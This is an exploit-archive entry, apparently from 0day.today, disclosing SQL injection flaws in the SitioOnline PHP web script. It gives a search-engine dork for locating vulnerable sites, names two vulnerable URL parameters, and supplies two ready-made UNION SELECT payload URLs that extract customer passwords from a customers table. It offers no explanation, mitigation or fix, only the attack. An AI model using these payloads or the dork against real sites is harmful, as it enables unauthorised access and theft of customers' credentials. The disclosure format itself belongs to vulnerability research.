id: 10267
date: 12/15/2009
title: SitioOnline SQL Injection Vulnerability
author: 4lG3r14n0-t3r0
cves: 

=======================================
SitioOnline SQL Injection Vulnerability
=======================================

***************************************************************************/
 
[ Software Information ]
 
[+] Vendor : http://www.SitioOnline.cl
[+] script   : SitioOnline
[+] Download :
[+] Vulnerability : php SQL injection
[+] Dork :inurl:"lista_articulos.php?id_categoria="
    or Powered by SitioOnline.com
 
 
**************************************************************************/
[ Vulnerable File ]
 
http://server/lista_articulos.php?id_categoria=
 
http://server/detalle_articulo.php?id_producto=
 
[ Exploit ]
 
[1]
 
http://server/lista_articulos.php?id_categoria=42+union+select+1,customers_password+from+customers--
 
 
[2]
 
 
http://server/detalle_articulo.php?id_producto=-7+union+select+1,customers_password+from+customers--



#  0day.today [2023-03-25]  #